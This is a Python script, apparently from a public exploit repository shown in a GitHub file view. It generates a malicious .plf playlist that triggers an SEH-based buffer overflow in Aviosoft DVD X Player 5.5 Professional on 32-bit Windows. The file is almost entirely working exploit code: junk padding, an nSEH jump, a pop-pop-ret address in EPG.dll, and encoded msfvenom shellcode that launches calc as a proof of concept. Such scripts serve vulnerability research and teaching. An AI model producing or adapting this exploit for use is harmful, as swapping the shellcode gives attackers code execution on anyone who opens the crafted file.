-
Notifications
You must be signed in to change notification settings - Fork 12
Expand file tree
/
Copy pathdvd_X_Player_5.5_PRO.py
More file actions
65 lines (55 loc) · 3.13 KB
/
dvd_X_Player_5.5_PRO.py
File metadata and controls
65 lines (55 loc) · 3.13 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/python
# Windows xp sp3 32 bits
# Windows 7 enterprise 32 bits
import struct
outfile = 'popcalc_exploit_seh.plf'
# Just some junk at the beginning
junk = "A" * 608
# 00000000 EB06 jmp short 0x8
nseh = struct.pack(">L",0xEB069090)
# 0x61617619 : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\Aviosoft\DVD X Player 5.5 Professional\EPG.dll)
seh = struct.pack("<L",0x61617619)
# msfvenom -p windows/exec CMD=calc EXITFUNC=seh -e x86/alpha_mixed -f python -b "\x00\x0a\x1a" -v shellcode
shellcode = "\x90" * 20 # nop sled
shellcode += shellcode
shellcode += "\x89\xe6\xda\xd3\xd9\x76\xf4\x5f\x57\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x4b\x4c\x78\x68\x4c\x42\x67\x70\x33\x30\x63\x30"
shellcode += "\x43\x50\x4f\x79\x59\x75\x65\x61\x79\x50\x35\x34"
shellcode += "\x4e\x6b\x56\x30\x70\x30\x6c\x4b\x72\x72\x64\x4c"
shellcode += "\x4c\x4b\x61\x42\x64\x54\x6e\x6b\x43\x42\x36\x48"
shellcode += "\x36\x6f\x6d\x67\x51\x5a\x35\x76\x65\x61\x69\x6f"
shellcode += "\x6c\x6c\x77\x4c\x75\x31\x51\x6c\x53\x32\x66\x4c"
shellcode += "\x61\x30\x4b\x71\x58\x4f\x66\x6d\x57\x71\x7a\x67"
shellcode += "\x59\x72\x4c\x32\x33\x62\x30\x57\x4c\x4b\x76\x32"
shellcode += "\x54\x50\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x50\x4c"
shellcode += "\x42\x31\x34\x38\x39\x73\x70\x48\x55\x51\x58\x51"
shellcode += "\x46\x31\x6e\x6b\x71\x49\x71\x30\x73\x31\x58\x53"
shellcode += "\x4c\x4b\x53\x79\x54\x58\x4b\x53\x65\x6a\x77\x39"
shellcode += "\x6e\x6b\x35\x64\x4e\x6b\x53\x31\x69\x46\x36\x51"
shellcode += "\x59\x6f\x6c\x6c\x59\x51\x68\x4f\x34\x4d\x57\x71"
shellcode += "\x4f\x37\x44\x78\x79\x70\x52\x55\x69\x66\x44\x43"
shellcode += "\x43\x4d\x4c\x38\x75\x6b\x31\x6d\x55\x74\x53\x45"
shellcode += "\x6d\x34\x62\x78\x6e\x6b\x43\x68\x75\x74\x63\x31"
shellcode += "\x39\x43\x55\x36\x4e\x6b\x64\x4c\x32\x6b\x4e\x6b"
shellcode += "\x51\x48\x45\x4c\x65\x51\x68\x53\x4c\x4b\x64\x44"
shellcode += "\x4e\x6b\x33\x31\x4e\x30\x4b\x39\x33\x74\x37\x54"
shellcode += "\x64\x64\x51\x4b\x43\x6b\x75\x31\x43\x69\x50\x5a"
shellcode += "\x53\x61\x59\x6f\x69\x70\x31\x4f\x43\x6f\x71\x4a"
shellcode += "\x4c\x4b\x57\x62\x78\x6b\x6e\x6d\x33\x6d\x61\x7a"
shellcode += "\x45\x51\x6e\x6d\x4e\x65\x4e\x52\x33\x30\x47\x70"
shellcode += "\x35\x50\x52\x70\x61\x78\x54\x71\x6e\x6b\x32\x4f"
shellcode += "\x6c\x47\x59\x6f\x69\x45\x4d\x6b\x6b\x4e\x56\x6e"
shellcode += "\x57\x42\x69\x7a\x62\x48\x4e\x46\x6f\x65\x4f\x4d"
shellcode += "\x6f\x6d\x6b\x4f\x38\x55\x37\x4c\x57\x76\x53\x4c"
shellcode += "\x47\x7a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x43\x35"
shellcode += "\x4d\x6b\x51\x57\x34\x53\x64\x32\x70\x6f\x70\x6a"
shellcode += "\x45\x50\x70\x53\x69\x6f\x7a\x75\x45\x33\x73\x51"
shellcode += "\x32\x4c\x30\x63\x55\x50\x41\x41"
payload = junk + nseh + seh + shellcode
with open(outfile,'w') as exploit:
exploit.write(payload)
print 'Wrote %u bytes to %s' % (len(payload), outfile)